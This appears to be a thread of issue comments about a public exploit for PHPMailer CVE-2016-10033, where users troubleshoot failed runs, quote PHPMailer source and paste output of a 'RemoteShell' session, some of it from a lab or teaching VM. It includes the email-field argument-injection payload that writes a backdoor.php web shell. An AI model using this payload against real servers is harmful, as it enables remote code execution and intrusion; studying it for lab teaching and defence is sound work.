I was looking at your exploit code and it looks like it won't work, as you are passing "vulnerables@ -OQueueDirectory=/tmp -X/backdoor.php" to the setFrom() function, and the setFrom() function first verifies the passed email by some regex, and your malformed email address will not pass the verification

public function setFrom($address, $name = '', $auto = true) { $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim // Don't validate now addresses with IDN. Will be done in send(). if (($pos = strrpos($address, '@')) === false or (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and !$this->validateAddress($address)) { $error_message = $this->lang('invalid_address') . " (setFrom) $address"; $this->setError($error_message); $this->edebug($error_message);

There is a $this->validateAddress call, and if it fails, the function's execution is stopped and the following code is not executed
$this->From = $address; $this->FromName = $name; if ($auto) { if (empty($this->Sender)) { $this->Sender = $address; } }
Since $this->Sender is not set up with Sender's address then, the exploit will fail as it will use the default initialized value for $this->Sender.

All of the above code is from class.phpmailer.php

Olá uso Kali Linux 32bits em uma VM no Windows ME.
Seu script não está rodando como devia.

Bj, Xero, até!
🗡️

Hi there,

I'm working on a "Pentesting 101" talk and am trying to bolt together a Ubuntu Linux VM that will host a variety of popular vulnerabilities, and I'd love to get the PHPMailer exploit up and running (and certainly give you credit and point people towards your work). The Docker version works like a champ but I wanted to make my own native mail form so I could show people how to use your exploit to get a shell and then follow the path to exploring the VM file system, escalating privs, etc.

What I've done:

• Installed sendmail
• Plopped your index.php in /var/www/html
• Copied the src directory to /var/www/html/phpmailer
• Opened index.php and changed the PHPMailerAutoload.php path to be require 'phpmailer/PHPMailerAutoload.php';
• Edited the path in exploit.sh to be /var/www/html/backdoor.php instead of /www/backdoor.php

When the exploit runs, I can watch syslog and see the email going through from the POST request. Exploit.sh output says the shell is established and backdoor.php created, but neither of those things is actually happening.

Can you think of anything else I can do troubleshoot this and get it functional?

Thanks,
Brian

./exploit.sh www.example.com.br:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting www.example.com.br:8080
[+] Target exploited, acessing shell at http://www.example.com.br:8080/backdoor.php
[+] Running whoami
Base64: invalid entry

RemoteShell> pwd
[+] Running pwd
base64: entrada inválida

What Happens?

uname -ra
Linux fbctf 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

`./exploit.sh xxxxx:80
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting xxxxx:80
[+] Target exploited, acessing shell at http://xxxxx:80/backdoor.php
[+] Running whoami
base64: invalid option -- d
Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file]
-h, --help display this message
-D, --decode decodes input
-b, --break break encoded string into num character lines
-i, --input input file (default: "-" for stdin)
-o, --output output file (default: "-" for stdout)

RemoteShell>

Whatever thing I input after this (like ls, cd, whoami), I always get this kind of error message

base64: invalid option -- d Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file] -h, --help display this message -D, --decode decodes input -b, --break break encoded string into num character lines -i, --input input file (default: "-" for stdin) -o, --output output file (default: "-" for stdout)

What is going on? Are there other commands?

dfd7a7f removes text from the README regarding what specific environments are vulnerable.

Has the vulnerability been confirmed with PCRE enabled, or with PHP > 5.2.0?

When I run the exploit on my vulnerable VM, the remote shell doesn't reply. Here's an example :

root@PenTest-Kali:/opt/spl0its# ./phpmail 192.168.80.146:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 192.168.80.146:8080
[+] Target exploited, acessing shell at http://192.168.80.146:8080/backdoor.php
[+] Running whoami

RemoteShell> id
[+] Running id

RemoteShell> w
[+] Running w

when I see to if else condition
if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {
$result = @mail($to, $subject, $body, $header);
} else {
$result = @mail($to, $subject, $body, $header, $params);
}

in this case, I think if safe_mod is ON but $this->UseSendmailOptions is TRUE , the second condition "$result = @mail($to, $subject, $body, $header, $params);" still be processed
at 176 line code in class.phpmailer.php: "public $UseSendmailOptions = true;'